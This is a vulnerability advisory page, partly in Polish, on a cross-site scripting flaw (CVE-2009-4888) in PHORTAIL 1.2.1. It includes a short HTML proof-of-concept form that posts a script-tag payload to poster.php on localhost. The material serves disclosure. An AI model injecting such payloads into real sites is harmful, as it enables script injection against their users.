PHORTAIL v1.2.1 XSS Vulnerability

2010.06.15

Credit: Jonathan Salwan

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2009-4888

CWE: CWE-79

Ogólna skala CVSS: 4.3/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Częściowy

Wpływ na dostępność: Brak

<html><head><title>PHORTAIL v1.2.1 XSS Vulnerability</title></head>
<hr><pre>
Module   : PHORTAIL 1.2.1
download : http://www.phpscripts-fr.net/scripts/download.php?id=330
Vul      : XSS Vulnerability
file     : poster.php
Author   : Jonathan Salwan
Mail     : submit [AT] shell-storm.org
Web      : http://www.shell-storm.org
</pre><hr>

<form name="rapporter" action="http://localhost/poster.php" method="POST"></br>
	<input type="hidden" name="ajn" value="1">
	<input type="text" name="pseudo" value="xss">=>Pseudo</br>
	<input type="text" name="email"  value="xss@xss.com">=>E-mail</br>
	<input type="text" name="ti"     value="<script>alert('xss PoC');</script>">=>XSS vulnerability</br>
	<input type="text" name="txt"    value="xss">=>text</br>
	<input type="submit" value="Start"></br>
</form>
</html>

Referencje:

http://xforce.iss.net/xforce/xfdb/49143

http://www.vupen.com/english/advisories/2009/0631

http://www.securityfocus.com/bid/34038

http://secunia.com/advisories/34203

http://packetstormsecurity.org/0903-exploits/phortail-xss.txt

http://osvdb.org/52502

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHORTAIL v1.2.1 XSS Vulnerability

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.